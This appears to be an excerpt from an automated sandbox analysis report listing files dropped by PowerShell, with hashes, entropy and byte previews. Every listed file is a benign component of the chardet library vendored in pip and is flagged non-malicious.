                                                                                                                                                                                                                              Preview:........|.Vf.:..............................d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.....G.d...d.........Z.y.).a.....Module containing the UniversalDetector detector class, which is the primary.class a user of ``chardet`` should use...:author: Mark Pilgrim (initial port to Python).:author: Shy Shalom (original C code).:author: Dan Blanchard (major refactoring for 3.0).:author: Ian Cordasco......N)...List..Optional..Union.....)...CharSetGroupProber)...CharSetProber)...InputState..LanguageFilter..ProbingState)...EscCharSetProber)...Latin1Prober)...MacRomanProber)...MBCSGroupProber)...ResultDict)...SBCSGroupProber)...UTF1632Proberc.....................N.....e.Z.d.Z.d.Z.d.Z...e.j...................d.........Z...e.j...................d.........Z...e.j...................d.........Z.d.d.d.d.d.d.d.d.d...Z.d.d.d.d.d.d.d.d...Z.e.j...................d.f.d.e.d.e.d.d.
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):9962
                                                                                                                                                                                                                              Entropy (8bit):5.188586337545561
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:GctO4n3f5gRkd3kQlB3BMkZosiO8Z2462bou:W0fwg3EkZosgMv20u
                                                                                                                                                                                                                              MD5:3CEFCDEF4FA82423AABE007B1B0D1607
                                                                                                                                                                                                                              SHA1:D9386A488B8E9F820B424BA244949367B82D3B90
                                                                                                                                                                                                                              SHA-256:F414CBF994308A88A9E18655B2B0258A8D400B7DC5B69CA417A368B833D9E13F
                                                                                                                                                                                                                              SHA-512:29268B0B7CC2BE3C49D795197F7783EE2FFB2A8188413952B0033A8447A0C1E50DDC5A477DC0F1B8E48310E9E1338D5F6D3785CD4F841818EB0FBAED5FCA329D
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........|.Vf9!........................B.....d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.....G.d...d.e.........Z.y.)......)...List..Union.....)...CharSetProber)...ProbingStatec.............................e.Z.d.Z.d.Z.d.Z.d.Z.d...f.d...Z.d...f.d...Z.e.d.e.f.d...........Z.e.d.e.f.d...........Z.d.e.f.d...Z.d.e.f.d...Z.d.e.f.d...Z.d.e.f.d...Z.d.e.f.d...Z.d.e.f.d...Z.d.e.e.....d.d.f.d...Z.d.e.e.....d.d.f.d...Z.d.e.e.e.f.....d.e.f.d...Z.e.d.e.f.d...........Z.d.e.f.d...Z...x.Z.S.)...UTF1632Proberad.... This class simply looks for occurrences of zero bytes, and infers. whether the file is UTF16 or UTF32 (low-endian or big-endian). For instance, files looking like ( . . . [nonzero] )+. have a good probability to be UTF32BE. Files looking like ( . [nonzero] )+. may be guessed to be UTF16BE, and inversely for little-endian varieties.. .....g..G.z..?..returnNc.............................t...........|...............d.|._.........d.g.d.z...|._.........d.g.d.z...|._.........t.........j..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):3158
                                                                                                                                                                                                                              Entropy (8bit):5.06346511252941
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:EEo1cNWd5OSPlI2YTXjQ/X5AGAZkjo8uQCvGkTqYZc2XC2:EnTW8/okE8uvGkTqqdXB
                                                                                                                                                                                                                              MD5:72EB3F5F8ADD93A9AFA59B9FDE0CBD5A
                                                                                                                                                                                                                              SHA1:C24855943AFD7A92F4F79DAC8B1F16C9A05360CA
                                                                                                                                                                                                                              SHA-256:13AF2011EEF0569791A21ED8573C7E266E0D265E1A78F2678F59CF3F746F2B85
                                                                                                                                                                                                                              SHA-512:C6FEE0342944BB0035EAB3B5A7D2C58E7D8B475D852F71CE600DFBD63E4F812E58C6A50AAE81000101B45E371E52F31A2B2AD4EE201A97C48FD899A67F5333F2
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........|.Vf..........................Z.....d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.....G.d...d.e.........Z.y.)......)...Union.....)...CharSetProber)...CodingStateMachine)...MachineState..ProbingState)...UTF8_SM_MODELc............................e.Z.d.Z.d.Z.d...f.d...Z.d...f.d...Z.e.d.e.f.d...........Z.e.d.e.f.d...........Z.d.e.e.e.f.....d.e.f.d...Z.d.e.f.d...Z...x.Z.S.)...UTF8Proberg.......?..returnc.....................x.......t...........|...............t.........t.................|._.........d.|._.........|.j.............................y...Nr....)...super..__init__r....r......coding_sm.._num_mb_chars..reset....self..__class__s.... ..OC:\Users\xbov\Desktop\pyops\Lib\site-packages\pip/_vendor/chardet/utf8prober.pyr....z.UTF8Prober.__init__'...s+...................+.M..:..........................c.....................d.......t...........|...............|.j...................j.............................d.|._.........y.r....).r....r....r....r....r....s.... .r..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):471
                                                                                                                                                                                                                              Entropy (8bit):5.444017298406826
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:/0T6Ss5gXsL2HYGZv1VuaXE7vqMAQmnwKNnaCcD5anMLWAn:8+l5gzzXQmwKNn0UnNAn
                                                                                                                                                                                                                              MD5:08C7719ED375A5BDE8618A109D6929AC
                                                                                                                                                                                                                              SHA1:1FA9E8186105FC55E81592D722E8E3DB0447B22A
                                                                                                                                                                                                                              SHA-256:597BF54A771F27E636D741DDD3E9D989CC84E2EFDDED6124F979D342CCB56B54
                                                                                                                                                                                                                              SHA-512:B47F43E54EE4C170074D2229A55D5A6E4145B36C5453914C60AFF1498FE3DD7ADD73687BFD56D6CB91E842F1BD48C7EABFFBDAFCD7E733170C7F9715CA8B2D8B
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........|.Vf................................d.Z.d.Z.e.j...................d.........Z.y.).z..This module exists only to simplify retrieving the version number of chardet.from within setuptools and from chardet subpackages...:author: Dan Blanchard (dan.blanchard@gmail.com).z.5.1.0...N)...__doc__..__version__..split..VERSION........LC:\Users\xbov\Desktop\pyops\Lib\site-packages\pip/_vendor/chardet/version.py..<module>r........s!..............................C.. ..r....
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):31274
                                                                                                                                                                                                                              Entropy (8bit):3.8834419930806954
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:768:8u4wjuVhktU0mk0X5oUdVmPLg6BSjvzwjgebYX7VqM1H+nu:8pzktUc0X59dVE+jvw8cM1l
                                                                                                                                                                                                                              MD5:7A347287CCD4BF7ACC46F09F3914CD43
                                                                                                                                                                                                                              SHA1:EEEADE9B359E9599A79C5A772F9DC0B577F24DFD
                                                                                                                                                                                                                              SHA-256:96D71F3FEDCF8E53470A8A397B86BB0B8CFED838414D745F63A8DB31B07B3F7D
                                                                                                                                                                                                                              SHA-512:1AAB69197B47CF99D29C43F2039C721CB73AA7B8002F28262E540FCB1204704B30BF94047F5F9BCCB37C0A0DA456A96CAC2F0F5972A9756CA1068BDA998B42BE
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:######################## BEGIN LICENSE BLOCK ########################.# The Original Code is Mozilla Communicator client code..#.# The Initial Developer of the Original Code is.# Netscape Communications Corporation..# Portions created by the Initial Developer are Copyright (C) 1998.# the Initial Developer. All Rights Reserved..#.# Contributor(s):.# Mark Pilgrim - port to Python.#.# This library is free software; you can redistribute it and/or.# modify it under the terms of the GNU Lesser General Public.# License as published by the Free Software Foundation; either.# version 2.1 of the License, or (at your option) any later version..#.# This library is distributed in the hope that it will be useful,.# but WITHOUT ANY WARRANTY; without even the implied warranty of.# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU.# Lesser General Public License for more details..#.# You should have received a copy of the GNU Lesser General Public.# License along with this library; if
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1763
                                                                                                                                                                                                                              Entropy (8bit):4.971263998803787
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:vZixsiaiq5E807yRiyUVOkH/HqTbVB+H5ZRu2i2Azag/n:vsx/1ef0uwyUjHSaI2i2twn
                                                                                                                                                                                                                              MD5:26AE8AD2A42BC175C41901F8F2DEC2A6
                                                                                                                                                                                                                              SHA1:8E6A4E3CC825FF80BD38AE5E7DFD530608F574B2
                                                                                                                                                                                                                              SHA-256:94F31FC025FABF601A3E0BC587F7125997202C36D68850872D9FE9F5143DBB11
                                                                                                                                                                                                                              SHA-512:A490339039E30AFC9AEF5C182A5A11588AAC3187EDCEB9763F45A28D27010C6C1A9A01CA2C419B624DC5E3F2A7600987D631B80BC8CEF3794E63DC0B648F722D
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:######################## BEGIN LICENSE BLOCK ########################.# The Original Code is Mozilla Communicator client code..#.# The Initial Developer of the Original Code is.# Netscape Communications Corporation..# Portions created by the Initial Developer are Copyright (C) 1998.# the Initial Developer. All Rights Reserved..#.# Contributor(s):.# Mark Pilgrim - port to Python.#.# This library is free software; you can redistribute it and/or.# modify it under the terms of the GNU Lesser General Public.# License as published by the Free Software Foundation; either.# version 2.1 of the License, or (at your option) any later version..#.# This library is distributed in the hope that it will be useful,.# but WITHOUT ANY WARRANTY; without even the implied warranty of.# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU.# Lesser General Public License for more details..#.# You should have received a copy of the GNU Lesser General Public.# License along with this library; if
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):10032
                                                                                                                                                                                                                              Entropy (8bit):4.924169116677906
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:kt17u44xblmieSF7Bv9jkv91YRFUv9rMfj9Vvt9E7zv9YS:8u4+lmTy7BFjkFaRFUFofRVvjKzFYS
                                                                                                                                                                                                                              MD5:6E27E858753099C816A556596A3B7F91
                                                                                                                                                                                                                              SHA1:74B97C5D7ADE08C9D2EC0DD2EFFF1687ED164976
                                                                                                                                                                                                                              SHA-256:D7707C5D41B8A170EE2DD5EF7DB216C0B15E47E654DB502A4D2D7371D38DF1B5
                                                                                                                                                                                                                              SHA-512:9236BC417A8EF01BB243C9AC3A71F2F4882F30BDFC4B970E78ED96794840FACEA0637BF77D6354677D06FE6CFFF46151A9140BAD1E67DF9D70EA406E00F6FDF5
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:######################## BEGIN LICENSE BLOCK ########################.# The Original Code is Mozilla Communicator client code..#.# The Initial Developer of the Original Code is.# Netscape Communications Corporation..# Portions created by the Initial Developer are Copyright (C) 1998.# the Initial Developer. All Rights Reserved..#.# Contributor(s):.# Mark Pilgrim - port to Python.#.# This library is free software; you can redistribute it and/or.# modify it under the terms of the GNU Lesser General Public.# License as published by the Free Software Foundation; either.# version 2.1 of the License, or (at your option) any later version..#.# This library is distributed in the hope that it will be useful,.# but WITHOUT ANY WARRANTY; without even the implied warranty of.# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU.# Lesser General Public License for more details..#.# You should have received a copy of the GNU Lesser General Public.# License along with this library; if
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):3915
                                                                                                                                                                                                                              Entropy (8bit):4.538991165882778
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:vst17u4H6b0JbOhj8hSLgeQXv3hgX+IMWXVRA7KKv:kt17u4H6b86Meo3Z
                                                                                                                                                                                                                              MD5:AFD85E30AD448831E48E26C24993E082
                                                                                                                                                                                                                              SHA1:79187215075BB0BA7846F31AC27C1C2DF12BE7A3
                                                                                                                                                                                                                              SHA-256:50A2B749A2190763C274A4884B4827BCCB4B47D2495FAD8CF9F649BB73A55B28
                                                                                                                                                                                                                              SHA-512:9F19C1DCD3FBA9ABED5C82611BBD547F3FB047C1197382623765F80C50E4EBF0E6A9A041FEBAF0959CE74AB04F30114C22E69467CD52BFFE58A1756585C4EBFB
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:######################## BEGIN LICENSE BLOCK ########################.# The Original Code is Mozilla Communicator client code..#.# The Initial Developer of the Original Code is.# Netscape Communications Corporation..# Portions created by the Initial Developer are Copyright (C) 1998.# the Initial Developer. All Rights Reserved..#.# Contributor(s):.# Mark Pilgrim - port to Python.#.# This library is free software; you can redistribute it and/or.# modify it under the terms of the GNU Lesser General Public.# License as published by the Free Software Foundation; either.# version 2.1 of the License, or (at your option) any later version..#.# This library is distributed in the hope that it will be useful,.# but WITHOUT ANY WARRANTY; without even the implied warranty of.# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU.# Lesser General Public License for more details..#.# You should have received a copy of the GNU Lesser General Public.# License along with this library; if
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):5420
                                                                                                                                                                                                                              Entropy (8bit):4.742467088174273
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:Ptzcu49dbAz5Fd97MHRPNPGxGyP0LGAOcq/qY0iTSQzB8E:Ptzcu49dbAzjd90e+pZiDX
                                                                                                                                                                                                                              MD5:075B00A4FA888BE655F05F83A0D959D5
                                                                                                                                                                                                                              SHA1:2CAB239A6908E45CEE916F0AA9B9769FDF331ABD
                                                                                                                                                                                                                              SHA-256:2F7B7CFF020EA2FF1E9BEBD958E71B91DB2BC1EE3737AFE0A8D879A47ED63DDE
                                                                                                                                                                                                                              SHA-512:ED83C0816EA981CDA5887255BC88F2CB497239C8B69B8FFE5BD9C200C463730F92AD0556E2E4AE888B3214BDC04EC51435AE122FF16419167B90B9F1ECBEEA9E
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:######################## BEGIN LICENSE BLOCK ########################.# The Original Code is Mozilla Universal charset detector code..#.# The Initial Developer of the Original Code is.# Netscape Communications Corporation..# Portions created by the Initial Developer are Copyright (C) 2001.# the Initial Developer. All Rights Reserved..#.# Contributor(s):.# Mark Pilgrim - port to Python.# Shy Shalom - original C code.#.# This library is free software; you can redistribute it and/or.# modify it under the terms of the GNU Lesser General Public.# License as published by the Free Software Foundation; either.# version 2.1 of the License, or (at your option) any later version..#.# This library is distributed in the hope that it will be useful,.# but WITHOUT ANY WARRANTY; without even the implied warranty of.# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU.# Lesser General Public License for more details..#.# You should have received a copy of the GNU Lesser General Publi
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):178
                                                                                                                                                                                                                              Entropy (8bit):4.649588805404145
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:oxWOlllVO8l4+OFK5VcK85kdVWrzLUhKBzB0KTsM4RRwIaQHtgem/l:gl/Vne9w52KNdAreat04t4R6Iaatgemt
                                                                                                                                                                                                                              MD5:B04BEEEFBE1FFB5843F934EA952929F4
                                                                                                                                                                                                                              SHA1:28FD48106170AB568D9F58CE2430AFBDABAC898F
                                                                                                                                                                                                                              SHA-256:5B39D967A72F46D7CDCB62670C1A5890EA54C341642639E21D7C9988AB22DF1B
                                                                                                                                                                                                                              SHA-512:3CDD3F3F7FA831E7161B0C10DF17300496687F89ECDFA4520976947427B8275C7503CA9DADABFD1921ABCAB5F9059124793ACEDA87B7149373B29F442657041A
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........|.Vf................................y.).N..r..........QC:\Users\xbov\Desktop\pyops\Lib\site-packages\pip/_vendor/chardet/cli/__init__.py..<module>r........s.........r....
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):3995
                                                                                                                                                                                                                              Entropy (8bit):5.469614651816331
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:c6ozxjbycJBDTjt/yPx2aKJpZTI7LKeMNy5:cpxycJBDTjuEpZ07uR6
                                                                                                                                                                                                                              MD5:A402C7E229245EA77CE2D4646216A53E
                                                                                                                                                                                                                              SHA1:A1A0183061A5837BE23D0F6E296B53F78D1118F0
                                                                                                                                                                                                                              SHA-256:9027615C76BC0E52866530343E452B3FD06DD17778BC4B65CF125A5FEC16607E
                                                                                                                                                                                                                              SHA-512:E4FC5B3DA9049E91B6F9C9CCD5895B2F4C55BD591B44AB26B35B4665E22BF8BFA956D406C9E343DDF42E274FC67870A9E3861494DB141B434DA2C911C0180830
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........|.Vf...............................d.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.........d.d.e.e.....d.e.d.e.d.e.d.e.e.....f.d...Z.d.d.e.e.e.........d.d.f.d...Z.e.d.k(..r...e...........y.y.).a.....Script which takes one or more file paths and reports on their detected.encodings..Example::.. % chardetect somefile someotherfile. somefile: windows-1252 with confidence 0.5. someotherfile: ascii with confidence 1.0..If no paths are provided, it takes its input from stdin........N)...Iterable..List..Optional.....)...__version__)...UniversalDetector..lines..name..minimal..should_rename_legacy..returnc...........................t.........|...........}.|.D.],..}.t.........|.........}.|.j...................|...........|.j...................s..,..n...|.j.............................|.j...................}.|.r.|.d.....S.|.d.....r.|...d.|.d.......d.|.d.........S.|...d...S.).a..... Return a string describing the probable encoding of a file or. list of strings.
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):3242
                                                                                                                                                                                                                              Entropy (8bit):4.4239773940100475
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:Ono2f35GWg2znbZ2YC+714+skffzGyThbxEJPzFN2wa/sK8GoAHmgAcZOIBi:uoW5GWjb86C4GylyPxNDa/skLt1Bi
                                                                                                                                                                                                                              MD5:7FD01B5B41A862432ECE2E4254C47EA4
                                                                                                                                                                                                                              SHA1:F513CAE1E068585CD906F78626638A0422173C26
                                                                                                                                                                                                                              SHA-256:CE26CC560E51A4A6FE304F7FEC4606E1933649FD3B347710CD9D7653EAD8261A
                                                                                                                                                                                                                              SHA-512:42A52A1B0E89DE5EF262B3985FBE937C16CBD2EB2F5114574F5CEFA4A09CBD7F02BE4E89339755164F36BBDCCEB2CDDB2095810F81B594F86AB288913A527746
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:""".Script which takes one or more file paths and reports on their detected.encodings..Example::.. % chardetect somefile someotherfile. somefile: windows-1252 with confidence 0.5. someotherfile: ascii with confidence 1.0..If no paths are provided, it takes its input from stdin..."""...import argparse.import sys.from typing import Iterable, List, Optional..from .. import __version__.from ..universaldetector import UniversalDetector...def description_of(. lines: Iterable[bytes],. name: str = "stdin",. minimal: bool = False,. should_rename_legacy: bool = False,.) -> Optional[str]:. """. Return a string describing the probable encoding of a file or. list of strings... :param lines: The lines to get the encoding of.. :type lines: Iterable of bytes. :param name: Name of file or collection of lines. :type name: str. :param should_rename_legacy: Should we rename legacy encodings to. their more modern equivalents?.
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):3732
                                                                                                                                                                                                                              Entropy (8bit):4.64982144254191
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:Kt17u4wvK9RfAbiAgNHWnS38R80QInSb8MMg84bgSmwa:Kt17u4UK9Re2N+C0Gkwa
                                                                                                                                                                                                                              MD5:875D15127BE37B43051BAAE641D32600
                                                                                                                                                                                                                              SHA1:385FBF93113F5472A62E5C59F2FDADCF1464F30E
                                                                                                                                                                                                                              SHA-256:2BB93AF6CC378D8E439935E8489415B14B452102983D054E48926106E1AFFF21
                                                                                                                                                                                                                              SHA-512:BF80E08FC18F3F9108F095A171614DBE6E409DB7CA53A0DC1AA64D486B907ABBEA4A19B3C5A446C6FCAC629FEA3E6C6A35CA7DA1F9D3312F86BD3E42FB109E19
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:######################## BEGIN LICENSE BLOCK ########################.# The Original Code is mozilla.org code..#.# The Initial Developer of the Original Code is.# Netscape Communications Corporation..# Portions created by the Initial Developer are Copyright (C) 1998.# the Initial Developer. All Rights Reserved..#.# Contributor(s):.# Mark Pilgrim - port to Python.#.# This library is free software; you can redistribute it and/or.# modify it under the terms of the GNU Lesser General Public.# License as published by the Free Software Foundation; either.# version 2.1 of the License, or (at your option) any later version..#.# This library is distributed in the hope that it will be useful,.# but WITHOUT ANY WARRANTY; without even the implied warranty of.# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU.# Lesser General Public License for more details..#.# You should have received a copy of the GNU Lesser General Public.# License along with this library; if not, write to th
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):542
                                                                                                                                                                                                                              Entropy (8bit):4.751216480268753
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:1REYBd6KovticsBELPpYYB95Tlx9kgQZPuVa/DXjhuVa/3HvutVa/IWR/OuxM:1REO6jGELxYuV9MZPN7ThNvH5/O1
                                                                                                                                                                                                                              MD5:9167BADF986B97C3B7E6F4988B715121
                                                                                                                                                                                                                              SHA1:0FC9A11759B0E8DCE7AD2749F1C0FDE679298BD2
                                                                                                                                                                                                                              SHA-256:D066371E2DAA219BC3ACE389DC0B6AA6933546C631AFFEBA111E041E3B8C88C7
                                                                                                                                                                                                                              SHA-512:F8D3615B97901EBC425473579245FD8FD438FA04F17F48E5EE8066B168B6BA6D7852977123D078319085C7A160545B7090A829211B985BF48E8F1F5AE3D96C96
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:from typing import TYPE_CHECKING, Tuple..if TYPE_CHECKING:. # TypedDict was introduced in Python 3.8.. #. # TODO: Remove the else block and TYPE_CHECKING check when dropping support. # for Python 3.7.. from typing import TypedDict.. class CodingStateMachineDict(TypedDict, total=False):. class_table: Tuple[int, ...]. class_factor: int. state_table: Tuple[int, ...]. char_len_table: Tuple[int, ...]. name: str. language: str # Optional key..else:. CodingStateMachineDict = dict.
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1860
                                                                                                                                                                                                                              Entropy (8bit):4.9678786545405265
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:Pixsiaiq5E807yRiyUVOkH/HqTbVB+HDsZRuHwAHOaSG:Kx/1ef0uwyUjHSEWIHwCSG
                                                                                                                                                                                                                              MD5:08BA79A18D5CE7A97629F1435C452E61
                                                                                                                                                                                                                              SHA1:962BC070D81F55F43E49E48C6A609E7FFBB5CD88
                                                                                                                                                                                                                              SHA-256:D2329157B7C40AE588D7AACD9E4B3464408A03589960220468FF00D59BE35122
                                                                                                                                                                                                                              SHA-512:14208B0E91F0CD11051DBF72D55BDE342B342C445EE724A86539DE8A2E4169206FADADDD27C21A50CF95986F20899DB5AEBB0B2123701325F08FC718C02DFF81
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:######################## BEGIN LICENSE BLOCK ########################.# The Original Code is mozilla.org code..#.# The Initial Developer of the Original Code is.# Netscape Communications Corporation..# Portions created by the Initial Developer are Copyright (C) 1998.# the Initial Developer. All Rights Reserved..#.# Contributor(s):.# Mark Pilgrim - port to Python.#.# This library is free software; you can redistribute it and/or.# modify it under the terms of the GNU Lesser General Public.# License as published by the Free Software Foundation; either.# version 2.1 of the License, or (at your option) any later version..#.# This library is distributed in the hope that it will be useful,.# but WITHOUT ANY WARRANTY; without even the implied warranty of.# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU.# Lesser General Public License for more details..#.# You should have received a copy of the GNU Lesser General Public.# License along with this library; if not, write to th
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1683
                                                                                                                                                                                                                              Entropy (8bit):4.8933797176894105
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:uKNXATrMIUJhNkOFbFHiqd4nMSB3M7HSpnxacagrxdI5rLGUC6P:F9ATcjniqd4H1pntawXUZ
                                                                                                                                                                                                                              MD5:95EF7A9DF7A41BAB93F214AAF12F589C
                                                                                                                                                                                                                              SHA1:D32FE5903A7E6BA80CF8B948E6A05871A7D57E2F
                                                                                                                                                                                                                              SHA-256:4F3102899A0228D32A83053BE9C3C278A58506A696BC074B31EBF9FDB0A4858F
                                                                                                                                                                                                                              SHA-512:9B3EFFFB8A91C4E957478900C4DC145F8C12248E40D31F5F73303CB9FDC1BF8EDE79666F3B17EE2DC377FF6C0D6960B8032CC4F4E150EC1D510AF11D603616EE
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:""".All of the Enums that are used throughout the chardet package...:author: Dan Blanchard (dan.blanchard@gmail.com)."""..from enum import Enum, Flag...class InputState:. """. This enum represents the different states a universal detector can be in.. """.. PURE_ASCII = 0. ESC_ASCII = 1. HIGH_BYTE = 2...class LanguageFilter(Flag):. """. This enum represents the different language filters we can apply to a. ``UniversalDetector``.. """.. NONE = 0x00. CHINESE_SIMPLIFIED = 0x01. CHINESE_TRADITIONAL = 0x02. JAPANESE = 0x04. KOREAN = 0x08. NON_CJK = 0x10. ALL = 0x1F. CHINESE = CHINESE_SIMPLIFIED | CHINESE_TRADITIONAL. CJK = CHINESE | JAPANESE | KOREAN...class ProbingState(Enum):. """. This enum represents the different states a prober can be in.. """.. DETECTING = 0. FOUND_IT = 1. NOT_ME = 2...class MachineState:. """. This enum represents the different states a state machine can be in.. """.. START = 0.
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):4006
                                                                                                                                                                                                                              Entropy (8bit):4.798841980506169
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:Kt17u4/BPYJNJGELunY6o3w9cS6HL6awXaUAsk2n:Kt17u4/BKj1LuY6o3wT6eaaV
                                                                                                                                                                                                                              MD5:FC0026DD05383DF4F466FE74A475168F
                                                                                                                                                                                                                              SHA1:857EE9F5F0B4BF6E1EE2CC007433E071C75E9396
                                                                                                                                                                                                                              SHA-256:2A1A38F17EB9C44D2C705CA521D7898CCD9B71BBD1BEFD21D1651B316AC90F70
                                                                                                                                                                                                                              SHA-512:8C440012D2554C2B4EA7B4875E161130065B141CDC6A1506E8284096543C26E22E213D61D79B51D6F51548795289627369224885BEC2D19C15237D33C4915818
                                                                                                                                                                                                                              Malicious:false
